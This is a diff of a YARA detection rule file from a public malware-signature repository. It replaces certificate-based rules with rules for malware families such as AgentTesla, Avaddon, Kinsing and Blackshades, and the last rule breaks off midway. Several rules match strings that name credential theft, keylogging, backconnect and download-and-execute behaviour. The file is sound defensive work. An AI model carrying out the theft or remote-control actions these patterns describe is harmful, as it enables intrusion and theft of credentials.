-		id = "8e1bb307-733c-5626-98f6-a5c2587bf800"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ff9b1c2e-66a1-5e09-8bc2-a7543161e518"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4647-L4658"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1227-L1247"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4bbe5aac8a470061abab48070fafd2100c577cab1f40fcc5924dbd13bc747487"
+		logic_hash = "3d366327c2272761349687b11e4d6baada5000936dc7f81665e0303f7d1e5121"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1d41b9f7714f221d76592e403d2fbb0f0310e697"
-		importance = 20
+
+	strings:
+		$s1 = "Software\\Microsoft\\PnpSetup" ascii wide
+		$s2 = "Mutex_lnkword_little" ascii wide
+		$s3 = "(Prxy%c-%s:%u)" fullword ascii
+		$s4 = "(Prxy-No)" fullword ascii
+		$s5 = "/index.htm" fullword ascii
+		$s6 = "CONNECT %s:%d" ascii
+		$s7 = "\\$NtRecDoc$" fullword ascii
+		$s8 = "qazWSX123$%^" ascii
+		$s9 = "Software\\Microsoft\\Core" ascii wide
+		$s10 = "Mutex_lnkch" ascii wide
+		$s11 = "Event__lnkch__" ascii wide
+		$s12 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)" fullword ascii
+		$s13 = "User-Agent: Mozilla/5.00 (compatible; MSIE 6.0; Win32)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVER d.o.o." and pe.signatures [ i ] . serial == "1a:ec:3d:3f:75:2a:38:61:7c:1d:7a:67:7d:0b:55:91" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_E5B2Af04Ea4B84A94609A47Eba3164Ec : FILE
+rule DITEKSHEN_MALWARE_Win_Rhttpctrl : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "RHttpCtrl backdoor payload"
 		author = "ditekSHen"
-		id = "ea78ae13-cd9f-578a-95e4-906ab7045faf"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "fa80db13-90af-5d6a-bcc2-ad1f6808268e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4660-L4671"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1249-L1265"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2e32bb0d9689625cd860a75539961410241de341ad4b7ee661df7d3b2dd47c46"
+		logic_hash = "a8b27fcc4636c2fe02a0e006295ece7f705cc9a042921f66ef1f9b6a88aaf9a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7785d50066faee71d1a463584c1a97f34431ddfe"
-		importance = 20
+
+	strings:
+		$s1 = "%d_%04d%02d%02d%02d%02d%02d." ascii
+		$s2 = "ver=%s&id=%06d&type=" ascii
+		$s3 = "ver=%d&id=%s&random=%d&" ascii
+		$s4 = "id=%d&output=%s" ascii
+		$s5 = "Error:WinHttpCrackUrl failed!/n" ascii
+		$s6 = "Error:SendRequest failed!/n" ascii
+		$s7 = ".exe a %s %s" ascii
+		$s8 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" fullword wide
+		$pdb = "\\WorkSources\\RHttpCtrl\\Server\\Release\\svchost.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RRGRQJRWZHRTLFAUVK" and pe.signatures [ i ] . serial == "e5:b2:af:04:ea:4b:84:a9:46:09:a4:7e:ba:31:64:ec" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( $pdb and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Dummy01 : FILE
+rule DITEKSHEN_MALWARE_Win_Pillowmint : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "PillowMint POS payload"
 		author = "ditekSHen"
-		id = "eaf3bbdd-72b4-513c-9a5b-04f16292fa00"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e3d26a12-45aa-5f5d-997a-f350bc1bea97"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4673-L4687"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1267-L1283"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c72ac977ef92feead0a7ec72ec99b1a11f20b8c5258a08842a4dceddff91d659"
+		logic_hash = "ed2597fce1c56d2e110790e0eb89834b1bb9f6f52d39105157c9ffe2ede6cc7a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint1 = "16b7eb40b97149f49e8ec885b0a7fa7598f5a00f"
-		thumbprint2 = "902bf957b57f134619443d80cb8767250e034110"
-		thumbprint3 = "505f0055a66216c81420f41335ea7a4eb7b240fe"
-		thumbprint4 = "c05a6806d770dcec780e0477b83f068a1082be06"
-		importance = 20
+
+	strings:
+		$s1 = "system32\\sysvols\\" ascii nocase
+		$s2 = "Sysnative\\sysvols\\" ascii nocase
+		$s3 = "critical.log" fullword ascii
+		$s4 = "log.log" fullword ascii
+		$s5 = "commands.txt" fullword ascii
+		$s6 = "_EV0LuTi0N_" ascii
+		$s7 = /(file|reg)\scmd:/ fullword ascii
+		$s8 = "dumper_nologs_" ascii
+		$s9 = "ReflectiveLoader" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dummy certificate" and pe.signatures [ i ] . serial == "01" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00A7E1Dc5352C3852C5523030F57F2425C : FILE
+rule DITEKSHEN_MALWARE_Win_Blackshadesrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "BlackshadesRAT / Cambot POS payload"
 		author = "ditekSHen"
-		id = "fba8f1a8-ca08-5d6f-a83e-c817daf94703"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "bd0ad920-109a-50b5-94af-6580684bff52"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4689-L4700"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1285-L1300"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "06c151ae8b4a45eccef028ea69f0adf74445bd4d871fc65cc1d308f2005cede1"
+		logic_hash = "5c2a76ce52bce9c37a3518ff459011acb733c2c5abac74786e41a1c169459ce2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "09232474b95fc2cfb07137e1ada82de63ffe6fcd"
-		importance = 20
+		snort_sid = "920208-920210"
+
+	strings:
+		$s1 = "bhookpl.dll" fullword wide
+		$s2 = "drvloadn.dll" fullword wide
+		$s3 = "drvloadx.dll" fullword wide
+		$s4 = "SPY_NET_RATMUTEX" fullword wide
+		$s5 = "\\dump.txt" fullword wide
+		$s6 = "AUTHLOADERDEFAULT" fullword wide
+		$pdb = "*\\AC:\\Users\\Admin\\Desktop_old\\Blackshades project\\bs_bot\\bots\\bot\\bs_bot.vbp" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pushka LLC" and pe.signatures [ i ] . serial == "00:a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( $pdb and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_635517466B67Bd4Bba805Bc67Ac3328C : FILE
+rule DITEKSHEN_MALWARE_Win_Goldenspy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "b7533186-b5dc-53ce-912b-39bd42c92071"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4702-L4713"
+		description = "GoldenSpy dropper payload"
+		author = "SpiderLabs Trustwave"
+		id = "01d3f14a-fefb-5cea-b055-d7e9f4c7d13b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1302-L1314"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "71cdb314e2f6bda70f9f627d72aea49290fdbce66f76a170aa6571873ca82860"
+		logic_hash = "908047db2167733da0089375dbfd636881e721cc219da110755b81581d438cfa"
 		score = 75
-		quality = 75
+		quality = 67
 		tags = "FILE"
-		thumbprint = "0b3144ec936028cbf5292504ef2a75eea8eb6c1d"
-		importance = 20
+
+	strings:
+		$reg = "Software\\IDG\\DA" nocase wide ascii
+		$str1 = "requestStr" nocase wide ascii
+		$str2 = "nb_app_log_mutex" nocase wide ascii
+		$str3 = { 510F4345[0-10]50518D8DCCFE[0-20]837D1C[0-20]8D45[0-15]0F4345[0-20]505157 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEDIATEK INC." and pe.signatures [ i ] . serial == "63:55:17:46:6b:67:bd:4b:ba:80:5b:c6:7a:c3:32:8c" )
+		( uint16( 0 ) == 0x5A4D ) and $reg and 2 of ( $str* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_A2253Aeb5B0Ff1Aecbfd412C18Ccf07A : FILE
+rule DITEKSHEN_MALWARE_Win_Plurox : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Plurox backdoor payload"
 		author = "ditekSHen"
-		id = "82d70dae-97e7-5fa3-8a91-de6143fa2164"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c8a97132-c1d5-5456-a055-d46a9399dbdd"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4729-L4740"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1316-L1328"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "357de1cbdf3223dfb1a920bfb15bbbd66906de5225c0ed015e5a3fbbbb65a753"
+		logic_hash = "c2ec2ce7a9210d8eebb06c755eab51cab93fe6d48d737fd1756ffe42d46b35d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b03db8e908dcf0e00a5a011ba82e673d91524816"
-		importance = 20
+
+	strings:
+		$s1 = "autorun.c" fullword ascii
+		$s2 = "launcher.c" fullword ascii
+		$s3 = "loader.c" fullword ascii
+		$s4 = "stealth.c" fullword ascii
+		$s5 = "RunFromMemory" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gallopers Software Solutions Limited" and pe.signatures [ i ] . serial == "a2:25:3a:eb:5b:0f:f1:ae:cb:fd:41:2c:18:cc:f0:7a" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_21E3Cae5B77C41528658Ada08509C392 : FILE
+rule DITEKSHEN_MALWARE_Win_Avalon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Avalon infostealer payload"
 		author = "ditekSHen"
-		id = "bd97478f-1b75-542d-814c-8d318d745240"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "3de01419-9f45-5d82-8391-2e1e41df2b34"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4742-L4753"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1330-L1359"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c860e888b19b98c40cf00babfb022a79a35f12def0077733e796b2aeeea324ea"
+		logic_hash = "1aa9dc09ec4c8962dee0455dd367e32139e4c03f1b306f17ac6e82d71aacf713"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8acfaa12e5d02c1e0daf0a373b0490d782ea5220"
-		importance = 20
+
+	strings:
+		$s1 = "Parsecards" fullword ascii
+		$s2 = "Please_Gofuckyouself" fullword ascii
+		$s3 = "GetDomainDetect" fullword ascii
+		$s4 = "GetTotalCommander" fullword ascii
+		$s5 = "KnownFolder" fullword ascii
+		$s6 = "set_hidden" fullword ascii
+		$s7 = "set_system" fullword ascii
+		$l1 = "\\DomainDetect.txt" wide
+		$l2 = "\\Grabber_Log.txt" wide
+		$l3 = "\\Programs.txt" wide
+		$l4 = "\\Passwords_Edge.txt" wide
+		$l5 = "\\KL.txt" wide
+		$w1 = "dont touch" fullword wide
+		$w2 = "Grabber" fullword wide
+		$w3 = "Keylogger" fullword wide
+		$w4 = "password-check" fullword wide
+		$w5 = "H4sIAAAAAAAEA" wide
+		$p1 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide
+		$p2 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Design International Holdings Limited" and pe.signatures [ i ] . serial == "21:e3:ca:e5:b7:7c:41:52:86:58:ad:a0:85:09:c3:92" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_09B3A7E559Fcb024C4B66B794E9540Cb : FILE
+rule DITEKSHEN_MALWARE_Linux_Kinsing : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Kinsing RAT payload"
 		author = "ditekSHen"
-		id = "5e1057d4-a40c-5e48-8965-91fd533c04dc"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b13d2c36-c8d3-5138-9e9a-8b5390a93c8d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4790-L4802"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1361-L1376"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "345abbb31986fe3f8f6b7eb05c73d4d42daa9df6a7706b9cd2fb4f8aac61d40b"
+		logic_hash = "566eb7d1864e3a8088ad4f5d032d6d62a33080bbfc5c20c2520315cfc8146afc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "59c60ade491c9eda994711b1fdb59510baad2ea3"
-		hash1 = "b57d694b6d1f9e0634953e8f5c1e4faf84fb50be806a8887dd5b31bfd58a167f"
-		importance = 20
+
+	strings:
+		$s1 = "backconnect" ascii
+		$s2 = "connectForSocks" ascii
+		$s3 = "downloadAndExecute" ascii
+		$s4 = "download_and_exec" ascii
+		$s5 = "masscan" ascii
+		$s6 = "UpdateCommand:" ascii
+		$s7 = "exec_out" ascii
+		$s8 = "doTask with type %s" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Windscribe Limited" and pe.signatures [ i ] . serial == "09:b3:a7:e5:59:fc:b0:24:c4:b6:6b:79:4e:95:40:cb" )
+		uint16( 0 ) == 0x457f and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_19Beff8A6C129663E5E8C18953Dc1F67 : FILE
+rule DITEKSHEN_MALWARE_Win_Avaddon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Avaddon ransomware payload"
 		author = "ditekSHen"
-		id = "8bc27a0c-898d-510f-ad9d-78d5bab40cad"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d5618c8a-17b7-5009-9947-a6462ad2a4af"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4804-L4815"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1378-L1395"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e62c4ab0652f872887b7bedadba3306c831351f57bc4a177302b1268d823f9f4"
+		logic_hash = "fc3032572d2ab2550d3dde738a3d403459da9b5b640acc814596d958b83620bf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ad3deacd821fee3bb158665bd7fa491e39aab2e6"
-		importance = 20
+
+	strings:
+		$s1 = "\\IMAGEM~1.%d\\VISUA~1\\BIN\\%s.exe" ascii
+		$s2 = "\\IMAGEM~1.%.2d-\\VISUA~1\\BIN\\%s.exe" ascii
+		$s3 = "\\IMAGEM~1.%d-Q\\VISUA~1\\BIN\\%s.exe" ascii
+		$s4 = "\\IMAGEM~1.%d\\%s.exe" ascii
+		$s5 = "EW6]>mFXDS?YBi?W5] CY 4Z8Y BY7Y BZ8Z CY7Y AY8Z CZ8Y!Y:Z" ascii
+		$s6 = "FY  AY 'Z      ;W      @Y  @Y 'Z    Y  @Y (Z" ascii
+		$s7 = "\"rcid\":\"" fullword ascii
+		$s8 = "\"ip\":\"" fullword ascii wide
+		$s9 = ".?AUANEventIsGetExternalIP@@" fullword ascii
+		$s10 = ".?AUANEventGetCpuMax@@" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CULNADY LTD LTD" and pe.signatures [ i ] . serial == "19:be:ff:8a:6c:12:96:63:e5:e8:c1:89:53:dc:1f:67" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : FILE
+rule DITEKSHEN_MALWARE_Win_Prolock : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "ProLock ransomware payload"
 		author = "ditekSHen"
-		id = "610f4147-9b32-5d96-bf27-10a8e0c3c347"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "88fa19ba-238c-5d4d-bf0c-d421ee2ecf1d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4817-L4828"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1397-L1413"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d3e625c05e974650bb9750f6dadbbba5825a34ea10902c807b9da457902d2b59"
+		logic_hash = "b7d2cc71acc4f643a86781d957afcf5203a2f4034b9ca7da93e8227ddee79f3b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0c212cdf3d9a46621c19af5c494ff6bad25d3190"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.ProLock"
+
+	strings:
+		$s1 = ".flat" fullword ascii
+		$s2 = ".data" fullword ascii
+		$s3 = ".api" fullword ascii
+		$s4 = "RtlZeroMemory" fullword ascii
+		$s5 = "LoadLibraryA" fullword ascii
+		$s6 = "Sleep" fullword ascii
+		$s7 = "lstrcatA" fullword ascii
+		$s8 = { 55 89 E5 8B 45 08 EB 00 89 45 EC 8D 15 4F 10 40 00 8D 05 08 10 40 00 83 E8 08 29 C2 8B 45 EC 01 C2 31 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROTIP d.o.o." and pe.signatures [ i ] . serial == "0c:f2:d0:b5:bf:dd:68:cf:77:7a:0c:12:f8:06:a5:69" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_56F008E69A7C4C3Feb389C66Eaf58259 : FILE
+rule DITEKSHEN_MALWARE_Win_Purplewave : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "PurpleWave infostealer payload"
 		author = "ditekSHen"
-		id = "bcd0cd8e-82ec-5d20-85d1-cbad455b6d90"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6f978190-4b4d-5346-9218-0c9104254b45"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4830-L4841"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1415-L1432"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ba02eb734b461b02744c5fc901e45f4574249607398fb8a73850d5d5e89788b"
+		logic_hash = "98dca005d2fdf7eea89661e162292451b544847a7f8b63c8c25c82241ec8e04a"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "a7dc8cb973ef5f54af0889549d84dee51a7db839"
-		importance = 20
+
+	strings:
+		$s1 = "/loader/" fullword ascii
+		$s2 = "\\load_" fullword wide
+		$s3 = "boundaryaswell" fullword ascii
+		$s4 = "[passwords]" ascii
+		$s5 = "[is_encrypted]" ascii
+		$s6 = "[cookies]" ascii
+		$s7 = ".?AVMozillaBrowser@@" fullword ascii
+		$s8 = ".?AVChromeBrowser@@" fullword ascii
+		$s9 = ".?AV?$money" ascii
+		$s10 = "at t.me/LuckyStoreSupport" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEDIATEK INC." and pe.signatures [ i ] . serial == "56:f0:08:e6:9a:7c:4c:3f:eb:38:9c:66:ea:f5:82:59" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_279B3A26F16A069Aa7Bca1811D44Ad9B : FILE
+rule DITEKSHEN_MALWARE_Java_Pyrogenic
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Pyrogenic/Qealler infostealer payload"
 		author = "ditekSHen"
-		id = "3ead1500-d510-5a9b-8a19-19f9f7f2cf95"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "2b9268f0-2f73-51ad-ab72-9289e42e5bb1"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4857-L4873"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1434-L1446"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5a01fd3db421a4b41318fa1264e8bc621ddeddb44b82b8f0b15e97eccec616e8"
+		logic_hash = "bb8cb939f06a376f72dcbbb1f04ec34526f72c3bcc3b146b905a8466826d2c24"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "4a9fc15f1d63145b622989c4f5bec4612095401e"
-		hash1 = "fc642048d9f0b8cb36649fd377fdb68dce3998f2a88e8c64acdc4e88435f2562"
-		hash2 = "914067034336e4ed8b56e66d6be29f34477d9fb38ba73095a3edca5ec9cb1a9c"
-		hash3 = "daf7e148f82807808cac8a21b1a3ce43491c3a140420442a1c1ee2d497a9e0a2"
-		hash4 = "3727044bebe4a14aed66df5119c11471a57b50c57ab4baaef4073323206d3b9b"
-		hash5 = "f0239d16f77b11e6b606b23a53c9e563f6360a27a03c0b9cf83b151ee8ee9088"
-		importance = 20
+		tags = ""
+
+	strings:
+		$s1 = "bbb6fec5ebef0d93" ascii wide
+		$s2 = "2a898bc98aaf6c96f2054bb1eadc9848eb77633039e9e9ffd833184ce553fe9b" ascii wide
+		$s3 = "addShutdownHook" ascii wide
+		$s4 = "obfuscated/META-INF/QeallerV" ascii wide
+		$s5 = "globalIpAddress" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGITAL DEVLIN LIMITED" and pe.signatures [ i ] . serial == "27:9b:3a:26:f1:6a:06:9a:a7:bc:a1:81:1d:44:ad:9b" )
+		all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_07Cef66A71C35Bc3Aed6D100C6493863 : FILE
+rule DITEKSHEN_MALWARE_Win_Agentteslav3 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "AgentTeslaV3 infostealer payload"
 		author = "ditekSHen"
-		id = "e07b0a2c-64ff-5e12-9f19-00a67a13fb89"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c44c69dd-5e95-595c-88c7-89e243648198"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4875-L4886"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1448-L1481"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "24b89e65bc9d60a60e57f749735214c462e56c3194906e4bca52d74463617be4"
+		logic_hash = "6c62b2f601eba3c83b60f7f6dbd3d0ec3c01af30f4312df897bb5e902c36fdac"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "9f65b1f0bed6e58ecdcc30b81b08b350fcc966a1"
-		importance = 20
+
+	strings:
+		$s1 = "get_kbok" fullword ascii
+		$s2 = "get_CHoo" fullword ascii
+		$s3 = "set_passwordIsSet" fullword ascii
+		$s4 = "get_enableLog" fullword ascii
+		$s5 = "bot%telegramapi%" wide
+		$s6 = "KillTorProcess" fullword ascii
+		$s7 = "GetMozilla" ascii
+		$s8 = "torbrowser" wide
+		$s9 = "%chatid%" wide
+		$s10 = "logins" fullword wide
+		$s11 = "credential" fullword wide
+		$s12 = "AccountConfiguration+" wide
+		$s13 = "<a.+?href\\s*=\\s*([\"'])(?<href>.+?)\\1[^>]*>" fullword wide
+		$g1 = "get_Clipboard" fullword ascii
+		$g2 = "get_Keyboard" fullword ascii
+		$g3 = "get_Password" fullword ascii
+		$g4 = "get_CtrlKeyDown" fullword ascii
+		$g5 = "get_ShiftKeyDown" fullword ascii
